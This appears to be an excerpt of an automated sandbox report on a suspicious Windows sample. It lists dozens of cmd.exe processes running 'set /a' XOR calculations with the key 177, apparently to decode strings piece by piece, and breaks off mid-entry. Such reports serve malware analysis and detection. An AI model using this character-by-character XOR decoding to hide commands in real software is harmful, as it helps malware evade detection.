                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "253^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "130^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "131^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "139^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "139^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:10:51:33
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "242^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:10:51:33
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:10:51:33
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "195^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:25
Start time:10:51:33
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:10:51:33
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "212^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:27
Start time:10:51:33
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "208^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "197^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "212^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:10:51:34
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "247^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "221^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "240^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "153^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:46
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "220^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:47
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:48
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:49
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:50
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "195^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:51
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:52
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "133^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:53
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:54
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:55
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:56
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "157^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:57
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:58
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:cmd.exe /c set /a "145^177"
Imagebase:
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:59
Start time:10:51:35
Start date:08/10/2024
Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "201^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                  Start time:10:51:36
                                                                                                                                                                                  Start date:08/10/2024
